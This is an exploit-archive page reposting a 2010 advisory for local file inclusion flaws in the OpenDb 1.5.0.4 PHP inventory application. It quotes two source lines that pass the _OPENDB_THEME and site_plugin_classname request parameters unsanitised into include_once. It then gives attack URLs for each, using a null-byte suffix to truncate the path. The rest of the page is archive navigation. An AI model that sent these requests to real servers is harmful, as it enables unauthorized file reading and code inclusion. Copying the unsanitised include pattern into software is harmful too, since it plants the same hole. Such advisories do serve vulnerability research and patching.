OpenDb 1.5.0.4 Local File Inclusion

OpenDb 1.5.0.4 Local File Inclusion: Posted Jan 24, 2010; Authored by ViRuSMaN; OpenDb version 1.5.0.4 suffers from multiple local file inclusion vulnerabilities.; tags | exploit, local, vulnerability, file inclusion; SHA-256 | 186bda482af53913ac64d05678b986721cf7d333daedacfe06e14f8c7a77548c; Download | Favorite | View

OpenDb 1.5.0.4 Local File Inclusion



==============================================================================
                      __     __   __      __   __     __
                     /  \   /  \  \ \    / /  /  \   /  \
                    / /\ \_/ /\ \  \ \  / /  / /\ \_/ /\ \
                   / /  \ _ /  \ \  \ \/ /  / /  \ _ /  \ \
                  /_/           \_\  \__/  /_/           \_\

==============================================================================
        [»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
        [»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

    [»] Script:             [ OpenDb ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
    [»] Download:           [ http://sourceforge.net/projects/opendb/files/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
 #~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
 #~ Line 213 :         include_once("./theme/$_OPENDB_THEME/theme.php");

    [»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
 #~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
 #~Line 126 :         include_once("./site/".$site_plugin_classname.".class.php");

    [»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################
________________________________
Windows Live: Keep your friends up to date with what you do online.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_1:092010>

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

OpenDb 1.5.0.4 Local File Inclusion

OpenDb 1.5.0.4 Local File Inclusion

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenDb 1.5.0.4 Local File Inclusion

Share This

OpenDb 1.5.0.4 Local File Inclusion

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems